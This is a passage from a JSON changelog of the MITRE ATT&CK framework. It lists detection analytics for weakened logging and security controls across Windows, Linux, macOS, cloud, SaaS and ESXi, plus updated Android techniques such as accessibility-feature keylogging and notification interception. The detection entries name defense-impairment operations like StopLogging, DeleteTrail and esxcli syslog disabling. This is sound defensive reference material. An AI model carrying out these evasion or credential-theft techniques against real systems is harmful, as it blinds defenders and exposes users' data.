+                        },
+                        {
+                            "field": "TelemetryGapThreshold",
+                            "description": "Acceptable heartbeat silence duration"
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.379000+00:00\", \"old_value\": \"2026-04-24 20:32:20.041000+00:00\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--c6fb992c-387e-49ee-beaf-a1351aded262",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-16 17:00:04.135000+00:00",
+                    "modified": "2026-05-12 16:30:18.382000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0900#AN2039",
+                            "external_id": "AN2039"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 2039",
+                    "description": "Detects exploitation attempts against security daemons or kernel security modules followed by daemon termination, disabled logging, module unload, audit stoppage, or reduced endpoint telemetry. Correlates local execution or network input with control degradation.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0",
+                            "name": "auditd:EXECVE",
+                            "channel": "execve, kill, ptrace, insmod, rmmod targeting security processes"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--74fa567d-bc90-425c-8a41-3c703abb221c",
+                            "name": "auditd:DAEMON",
+                            "channel": "auditd stopped, config changed, logging suspended"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "ProtectedProcessNames",
+                            "description": "Names of EDR, audit, AV, firewall daemons"
+                        },
+                        {
+                            "field": "ModuleUnloadAllowlist",
+                            "description": "Approved maintenance unload operations"
+                        },
+                        {
+                            "field": "HealthGapThreshold",
+                            "description": "Expected telemetry heartbeat tolerance"
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Linux"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.382000+00:00\", \"old_value\": \"2026-04-24 20:33:08.936000+00:00\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--9df50fd3-bbad-43ce-b511-1bf995f1b583",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-16 17:03:37.991000+00:00",
+                    "modified": "2026-05-12 16:30:18.381000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0900#AN2040",
+                            "external_id": "AN2040"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 2040",
+                    "description": "Detects crafted activity resulting in crashes or impairment of endpoint security extensions, network filters, launch daemons, or telemetry agents. Correlates process activity, system extension state changes, and telemetry interruption.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--ee575f4a-2d4f-48f6-b18b-89067760adc1",
+                            "name": "macos:unifiedlog",
+                            "channel": "Crash or abnormal termination of security agent or system extension host"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--f5a9a1dd-82f9-41a3-85b8-13e5b9cd6c79",
+                            "name": "macos:unifiedlog",
+                            "channel": "Extension disabled, unloaded, failed to start"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
+                            "name": "NSM:Flow",
+                            "channel": "Traffic spike preceding control crash"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "ExtensionList",
+                            "description": "Protected security system extensions"
+                        },
+                        {
+                            "field": "CrashBurstThreshold",
+                            "description": "Multiple failures in short interval"
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "macOS"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.381000+00:00\", \"old_value\": \"2026-04-24 20:32:41.903000+00:00\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--47df93f9-b33f-4333-95b6-b3cca9418a4d",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-16 17:08:44.505000+00:00",
+                    "modified": "2026-05-12 16:30:18.377000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0900#AN2041",
+                            "external_id": "AN2041"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 2041",
+                    "description": "Detects exploitation of cloud-native security boundaries or management components followed by disabled logging, detached agents, changed security groups, policy bypass, or telemetry suppression. Correlates suspicious API activity with reduced control coverage.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--ec0612c5-2644-4c50-bcac-82586974fedd",
+                            "name": "AWS:CloudTrail",
+                            "channel": "StopLogging, DeleteTrail, or DisableSecurityService"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--45d0ff14-b9c4-41f5-8603-156657c20b75",
+                            "name": "AWS:CloudTrail",
+                            "channel": "ModifyInstanceAttribute"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--d2ff4b56-8351-4ed8-b0fb-d8605366005f",
+                            "name": "AWS:CloudTrail",
+                            "channel": "AuthorizeSecurityGroupIngress"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "CriticalTrailList",
+                            "description": "Audit trails that must remain enabled"
+                        },
+                        {
+                            "field": "ControlChangeWindow",
+                            "description": "Time after suspicious API sequence to inspect coverage loss"
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "IaaS"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.377000+00:00\", \"old_value\": \"2026-04-24 20:31:38.954000+00:00\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--f46639b5-4d99-4d52-8da9-112a468cc6d8",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-16 17:10:51.287000+00:00",
+                    "modified": "2026-05-12 16:30:18.384000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0900#AN2042",
+                            "external_id": "AN2042"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 2042",
+                    "description": "Detects exploitation or abuse of SaaS security workflows resulting in disabled alerts, reduced retention, bypassed enforcement, role escalation, or tokenized persistence that weakens monitoring. Correlates unusual admin/API activity with visibility reduction.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa",
+                            "name": "saas:okta",
+                            "channel": "policy.rule.update;system.log.disable;admin.role.assign"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa",
+                            "name": "m365:unified",
+                            "channel": "Set-AdminAuditLogConfig;New-ApplicationAccessPolicy;ConsentToApplication"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "PrivilegedActorAllowlist",
+                            "description": "Approved admins allowed to change controls"
+                        },
+                        {
+                            "field": "RetentionChangeThreshold",
+                            "description": "Minimum acceptable logging retention"
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "SaaS"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.384000+00:00\", \"old_value\": \"2026-04-24 20:33:44.123000+00:00\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--702db8b6-641f-4526-a0d0-a5a62c499508",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-16 17:34:13.876000+00:00",
+                    "modified": "2026-05-12 16:30:18.378000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0901#AN2043",
+                            "external_id": "AN2043"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 2043",
+                    "description": "Detects processes or users modifying Windows Defender Firewall profiles, policies, or rules followed by measurable network exposure changes. Correlates firewall management execution, registry/policy mutation, service state changes, and subsequent inbound or outbound connectivity inconsistent with baseline administration.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077",
+                            "name": "WinEventLog:Sysmon",
+                            "channel": "EventCode=1"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077",
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=4688"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--da85d358-741a-410d-9433-20d6269a6170",
+                            "name": "WinEventLog:Sysmon",
+                            "channel": "EventCode=13, 14"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--7f70fae7-a68d-4730-a83a-f260b9606129",
+                            "name": "WinEventLog:Sysmon",
+                            "channel": "EventCode=12"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--5297a638-1382-4f0c-8472-0d21830bf705",
+                            "name": "WinEventLog:System",
+                            "channel": "EventCode=7036"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--181a9f8c-c780-4f1f-91a8-edb770e904ba",
+                            "name": "WinEventLog:Sysmon",
+                            "channel": "EventCode=3, 22"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--181a9f8c-c780-4f1f-91a8-edb770e904ba",
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=5156, 5157"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "AuthorizedAdminAccounts",
+                            "description": "Known administrators allowed to manage host firewall settings"
+                        },
+                        {
+                            "field": "MaintenanceWindow",
+                            "description": "Approved change windows where firewall modifications are expected"
+                        },
+                        {
+                            "field": "ExposureCorrelationWindow",
+                            "description": "Time window to correlate firewall change with new connections/listeners"
+                        },
+                        {
+                            "field": "SensitivePorts",
+                            "description": "Ports of concern such as RDP, SMB, WinRM, SSH, custom admin ports"
+                        },
+                        {
+                            "field": "AllowedManagementParents",
+                            "description": "Expected parent processes such as SCCM, Intune agent, GPO client"
+                        },
+                        {
+                            "field": "RuleScopeThreshold",
+                            "description": "Detect widening from subnet/local scope to Any/0.0.0.0/0"
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.378000+00:00\", \"old_value\": \"2026-04-24 20:32:08.148000+00:00\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--2b990a38-dedf-4a9a-9bd2-9a805c2f1b46",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-20 18:22:06.178000+00:00",
+                    "modified": "2026-05-12 16:30:18.376000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0497#AN2044",
+                            "external_id": "AN2044"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 2044",
+                    "description": "Detects esxcli commands disabling syslog, firewall, lockdown mode, or stopping hostd/vpxa; correlates command execution with reduced forwarding activity.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0",
+                            "name": "esxi:shell",
+                            "channel": "esxcli system syslog config set/reload, services.sh restart/stop"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--66531bc6-a509-4868-8314-4d599e91d222",
+                            "name": "esxi:hostd",
+                            "channel": "service state change"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "ExpectedAdminIPs",
+                            "description": "Authorized management sources."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "ESXi"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.376000+00:00\", \"old_value\": \"2026-04-24 20:31:16.812000+00:00\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--360eb601-28db-4418-8474-ad2a432ce534",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-23 14:52:04.808000+00:00",
+                    "modified": "2026-05-12 16:30:18.376000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0916#AN2059",
+                            "external_id": "AN2059"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 2059",
+                    "description": "Much of this takes place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "PRE"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.376000+00:00\", \"old_value\": \"2026-04-24 21:02:59.794000+00:00\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--3c500af0-d284-48c3-b23b-a22f8b77649d",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-23 14:54:24.674000+00:00",
+                    "modified": "2026-05-12 16:30:18.376000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0917#AN2060",
+                            "external_id": "AN2060"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 2060",
+                    "description": "Much of this takes place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "PRE"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.376000+00:00\", \"old_value\": \"2026-04-24 21:03:04.099000+00:00\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--33712883-6871-4147-8272-7cd1c6c64ad6",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-23 14:57:28.640000+00:00",
+                    "modified": "2026-05-12 16:30:18.376000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0918#AN2061",
+                            "external_id": "AN2061"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 2061",
+                    "description": "Much of this takes place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "PRE"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.376000+00:00\", \"old_value\": \"2026-04-24 21:02:57.004000+00:00\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--255379f1-e115-4f3c-835a-23c8d279847e",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-23 14:58:44.065000+00:00",
+                    "modified": "2026-05-12 16:30:18.376000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0919#AN2062",
+                            "external_id": "AN2062"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 2062",
+                    "description": "Much of this takes place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "PRE"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.376000+00:00\", \"old_value\": \"2026-04-24 21:02:46.916000+00:00\"}}}",
+                    "previous_version": "1.0"
+                }
+            ],
+            "revocations": [],
+            "deprecations": [],
+            "deletions": []
+        }
+    },
+    "mobile-attack": {
+        "techniques": {
+            "additions": [],
+            "major_version_changes": [],
+            "minor_version_changes": [],
+            "other_version_changes": [],
+            "patches": [
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--2204c371-6100-4ae0-82f3-25c07c29772a",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-10-25 14:48:08.613000+00:00",
+                    "modified": "2026-05-12 15:12:00.622000+00:00",
+                    "name": "Abuse Accessibility Features",
+                    "description": "Adversaries may abuse accessibility features in Android devices to steal sensitive data and to spread malware to other devices. Accessibility features in Android are designed to assist users with disabilities, performing a variety of tasks, such as using Action Blocks to control lightbulbs, and changing the device\u2019s user interface, such as changing the font size and adjusting contract or colors.(Citation: Google_AndroidAcsOverview) \n\nOne example of how adversaries abuse accessibility features is overlaying an HTML object mimicking a legitimate login screen. The user types their credentials in the overlay HTML object, which is then sent to the adversaries.(Citation: SahinSRLabs_FluBot_Dec2021)  \n\nAnother example is a malicious accessibility feature acting as a keylogger. The keylogger monitors changes on the EditText fields and sends it to the adversaries.(Citation: SahinSRLabs_FluBot_Dec2021) This method of attack is also described in [Keylogging](https://attack.mitre.org/techniques/T1417/001); whereas [Abuse Accessibility Features](https://attack.mitre.org/techniques/T1453) captures the overall abuse of accessibility features.  ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-mobile-attack",
+                            "phase_name": "collection"
+                        },
+                        {
+                            "kill_chain_name": "mitre-mobile-attack",
+                            "phase_name": "credential-access"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1453",
+                            "external_id": "T1453"
+                        },
+                        {
+                            "source_name": "Google_AndroidAcsOverview",
+                            "description": "Google. (n.d.). Android accessibility overview. Retrieved April 17, 2025.",
+                            "url": "https://support.google.com/accessibility/android/answer/6006564?hl=en&ref_topic=6007234&sjid=9936713164149272548-NA"
+                        },
+                        {
+                            "source_name": "SahinSRLabs_FluBot_Dec2021",
+                            "description": "\u015eahin, Erdo\u011fan Ya\u011f\u0131z. (2021, December 21). When your phone gets sick: FluBot abuses Accessibility features to steal data. Retrieved April 16, 2025.",
+                            "url": "https://www.srlabs.de/blog-post/flubot-abuses-accessibility-features-to-steal-data"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Luk\u00e1\u0161 \u0160tefanko, ESET",
+                        "Liran Ravich, CardinalOps"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "3.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.622000+00:00\", \"old_value\": \"2025-10-27 17:12:01.143000+00:00\"}}}",
+                    "previous_version": "3.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1011: User Guidance"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0697: Detection of Abuse Accessibility Features"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--9c049d7b-c92a-4733-9381-27e2bd2ccadc",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2022-04-01 15:59:05.830000+00:00",
+                    "modified": "2026-05-12 15:12:00.706000+00:00",
+                    "name": "Device Administrator Permissions",
+                    "description": "Adversaries may abuse Android\u2019s device administration API to obtain a higher degree of control over the device. By abusing the API, adversaries can perform several nefarious actions, such as resetting the device\u2019s password for [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1642), factory resetting the device for [File Deletion](https://attack.mitre.org/techniques/T1630/002) and to delete any traces of the malware, disabling all the device\u2019s cameras, or to make it more difficult to uninstall the app.\n\nDevice administrators must be approved by the user at runtime, with a system popup showing which actions have been requested by the app. In conjunction with other techniques, such as [Input Injection](https://attack.mitre.org/techniques/T1516), an app can programmatically grant itself administrator permissions without any user input.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-mobile-attack",
+                            "phase_name": "privilege-escalation"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1626/001",
+                            "external_id": "T1626.001"
+                        },
+                        {
+                            "source_name": "NIST Mobile Threat Catalogue",
+                            "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-22.html",
+                            "external_id": "APP-22"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_tactic_type": [
+                        "Post-Adversary Device Access"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.706000+00:00\", \"old_value\": \"2025-10-24 17:49:08.587000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.1",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1006: Use Recent OS Version",
+                            "M1011: User Guidance"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0630: Detection of Device Administrator Permissions"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--39dd7871-f59b-495f-a9a5-3cb8cc50c9b2",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2019-09-15 15:26:08.183000+00:00",
+                    "modified": "2026-05-12 15:12:00.627000+00:00",
+                    "name": "Access Notifications",
+                    "description": "Adversaries may collect data within notifications sent by the operating system or other applications. Notifications may contain sensitive data such as one-time authentication codes sent over SMS, email, or other mediums. In the case of Credential Access, adversaries may attempt to intercept one-time code sent to the device. Adversaries can also dismiss notifications to prevent the user from noticing that the notification has arrived and can trigger action buttons contained within notifications.(Citation: ESET 2FA Bypass) ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-mobile-attack",
+                            "phase_name": "collection"
+                        },
+                        {
+                            "kill_chain_name": "mitre-mobile-attack",
+                            "phase_name": "credential-access"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1517",
+                            "external_id": "T1517"
+                        },
+                        {
+                            "source_name": "ESET 2FA Bypass",
+                            "description": "Luk\u00e1\u0161 \u0160tefanko. (2019, June 17). Malware sidesteps Google permissions policy with new 2FA bypass technique. Retrieved September 15, 2019.",
+                            "url": "https://www.welivesecurity.com/2019/06/17/malware-google-permissions-2fa-bypass/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
